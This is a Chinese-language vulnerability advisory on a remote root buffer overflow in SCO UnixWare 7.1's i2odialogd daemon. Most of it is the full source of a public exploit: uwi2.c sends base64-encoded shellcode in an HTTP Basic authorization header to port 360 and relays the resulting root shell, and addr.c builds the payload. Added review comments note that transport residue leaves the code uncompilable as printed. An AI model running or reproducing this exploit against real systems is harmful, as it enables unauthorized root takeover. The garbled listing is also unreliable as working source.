SCO Unixware i2odialogd 远程溢出漏洞
发布日期:1999-12-22
更新日期:1999-12-22
受影响系统:
SCO Unixware 7.1
描述:
i2odialogd是一个为控制i2o子系统提供前端处理的进程。在缺省情况下,它在SCO Unixware中以root身份运行。其鉴别(认证)机制中存在一个严重的缓冲区溢出漏洞:username/passwd缓冲区为固定长度(88个字符)且未做边界检查,因此超长输入溢出该缓冲区后,可导致以root权限执行任意代码。值得注意的是,溢出数据在发送到服务器前必须先经过base64编码(即HTTP Basic认证所用的编码方式)。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* i2o remote root exploit for UnixWare 7.1
* compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
* ./uwi2 <hostname>
* The hard-coded RET address is 0x8047d4c
*
* To either replace the shellcode or change the offset you must
* first craft a program which outputs, in this order:
* - 92 bytes of your RET address (EIP starts at 89)
* - NOPs, as many as you would like
* - your shellcode
* - the character ":"
* - any character, maybe "A", as I've done below
* - NULL
* When printf()'ing this string, do NOT append a \newline!
* You then pipe the output of this program to a MIME encoder (mimencode
* on UnixWare). You then take the output of this program and paste it
* where I've marked below.
*
* Brock Tellier btellier@usa.net
*
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
#define BUFLEN 10000
/* since we're overflowing an Authenticate: Basic username */
/* our exploit code must be base64(MIME) encoded */
/*
 * Base64 (MIME) form of the payload that main() appends after the
 * "Authorization: Basic" header of the request. Per the header comment it
 * encodes, in order: the return address repeated, NOP padding, the
 * shellcode, a ":" separator and one filler byte.
 * NOTE(review): as printed, every line of the literal ends in "=" and is
 * followed by a lone `"` on the next line. That looks like quoted-printable
 * soft-line-break residue from how the page was transported rather than
 * part of the original source; the listing does not compile in this form.
 */
char *mimecode =
/**** CHANGE THIS PART OF THE EXPLOIT STRING ****/
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQTH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xteMduJXgeJXgyIXhExwLA7jX4HiflT=
"
"UVZW6xDo4P///y9iaW4vc2iqqqqqmqqqqqoHqpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkDpB";
/************************************************/
/*
 * HTTP/1.0 request prefix. main() formats it as "%s %s \r\n\r\n" with
 * mimecode, so the Basic credential value and the terminating blank line
 * are added there — which is why this literal ends right after
 * "Authorization: Basic" with no CRLF. The Host header names port 360,
 * matching the i2oport global. From a detection standpoint the request is
 * ordinary apart from an Authorization value several hundred bytes long,
 * far beyond any real username:password pair.
 */
char *auth=
"GET / HTTP/1.0\r\n"
"Host: localhost:360\r\n"
"Accept: text/html\r\n"
"Accept-Encoding: gzip, compress\r\n"
"Accept-Language: en\r\n"
"Negotiate: trans\r\n"
"User-Agent: xnec\r\n"
"Authorization: Basic";
/* Request assembled by sprintf() in main(); BUFLEN bounds it. */
char buf[BUFLEN];
/* Relay buffer shared by both directions of main()'s read/write loop. */
char sockbuf[BUFLEN];
char c;                 /* not referenced by the code shown */
int offset=0;           /* set from argv[2] in main(), never read afterwards */
int i, ascii,num;       /* only num is used: byte count returned by read() */
int i2oport = 360;      /* TCP port the request is sent to */
int sock;
/* NOTE(review): 0x80474b4 differs from the 0x8047d4c quoted in the file
 * header, and main() never references addr at all — the return address
 * that actually goes out is whatever the mimecode literal carries. */
int addr = 0x80474b4;
struct sockaddr_in sock_a;
struct hostent *host;
/*
 * Entry point: resolve argv[1], connect to TCP port i2oport, send the
 * pre-built request once, then relay bytes between stdin/stdout and the
 * socket until the process is killed.
 * `void main` is non-standard C, and the usage path calls exit(0), so a
 * missing argument is reported as success. Only <stdio.h>, <unistd.h> and
 * the socket headers are included: atoi, exit, strlen, memcpy and
 * select/fd_set all rely on implicit declarations here.
 */
void main (int argc, char *argv[]) {
if(argc < 2) {
fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
exit(0);
}
/* Optional argv[2] is parsed into the global offset, which nothing below reads. */
if(argc == 3) offset=atoi(argv[2]);
/* Request = auth + " " + mimecode + " \r\n\r\n". Both inputs are fixed
 * literals far shorter than BUFLEN, but sprintf itself is unbounded. */
sprintf(buf, "%s %s \r\n\r\n", auth, mimecode);
buf[BUFLEN - 1] = 0;
fprintf(stderr, "i2odialogd remote exploit for UnixWare 7.1\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
/* gethostbyname reports through h_errno, not errno, so this text is not meaningful. */
perror("gethostbyname");
exit(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("create socket");
exit(-1);
}
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(i2oport);
/* Copies h_length bytes without checking that it fits sizeof sock_a.sin_addr. */
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror("create connect");
exit(-1);
}
fflush(stdout);
// write exploit
/* Single unchecked write of the whole request; a short write is not handled. */
write(sock,buf,strlen(buf));
//begin read
/* Interactive relay: socket -> stdout, stdin -> socket. */
while(1) {
/* NOTE(review): `input` is never FD_ZERO'd, so the set starts each
 * iteration with indeterminate bits; select's return value is ignored. */
fd_set input;
FD_SET(0,&input);
FD_SET(sock,&input);
select(sock+1,&input,NULL,NULL,NULL);
if(FD_ISSET(sock,&input)) {
/* read() returning -1 or 0 is not checked: num goes to write() as-is
 * (-1 becomes a huge size_t) and EOF from the peer does not end the loop. */
num=read(sock,sockbuf,BUFLEN);
write(1,sockbuf,num);
}
if(FD_ISSET(0,&input))
/* Same unchecked read()/write() pairing for the stdin direction. */
write(sock,sockbuf,read(0,sockbuf,BUFLEN));
}
}
------
--- addr.c ---
/*
* addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2odialogd
* simply MIME encode the output of this program and put into the
* appropriate place in uwi2.c
*
* Usage: cc -o addr addr.c; ./addr <offset> <size>
*
* Brock Tellier btellier@usa.net
*/
#include <stdio.h>
#define NOP 0x90
/*
 * Raw x86 payload bytes, with "/bin/sh" embedded as plain text. main()
 * measures it with strlen(), so the copy stops at the first NUL byte —
 * the array as written ends with the implicit terminator only.
 */
char scoshell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/*
 * Writes the un-encoded payload to stdout; the file header says to
 * MIME-encode that output before pasting it into uwi2.c. Layout as
 * written: `size` bytes of NOP (0x90), addr stored at offsets 60..96 in
 * 4-byte steps, scoshell copied to offset 300, then ':' 'A' NUL in the
 * last three bytes. Only <stdio.h> is included, so atoi, memset and strlen
 * are implicitly declared. `void main` is non-standard C.
 */
void main(int argc, char *argv[]) {
long addr;
char buf[2000];
int i;
/* NOTE(review): offset has no initializer and is only assigned when
 * argc > 1, so a run with no arguments reads an indeterminate value below. */
int offset;
int size = 400;
if (argc > 1) offset = atoi(argv[1]);
/* size comes from argv unchecked: nothing confirms size <= sizeof buf or
 * that 300 + strlen(scoshell) and size - 3 stay inside the buffer. */
if (argc > 2) size = atoi(argv[2]);
addr=0x8046000 + offset;
memset(buf, NOP, size);
/* Stores addr (a long) through an int* at i = 60,64,...,96: the value is
 * converted to int and written via a type-punned pointer into a char array. */
for(i=60;i<100;i+=4)*(int *)&buf[i]=addr;
for(i = 0; i < strlen(scoshell); i++)
buf[i+300] = scoshell[i];
/* NOTE(review): '':'' and ''A'' are not valid C character constants as
 * printed; the doubled quotes look like quoting residue from page rendering. */
buf[size - 3] = '':'';
buf[size - 2] = ''A'';
buf[size - 1] = 0;
/* %x expects unsigned int but addr is long: format/argument mismatch. */
fprintf(stderr, "using addr 0x%x with offset %d \n", addr, offset);
fprintf(stderr, "mime-encode the stdoutput!\n");
/* buf is passed as the format string itself (CERT FIO30-C, non-literal
 * format); output runs up to the NUL placed at size - 1. */
printf(buf);
}
建议:
暂无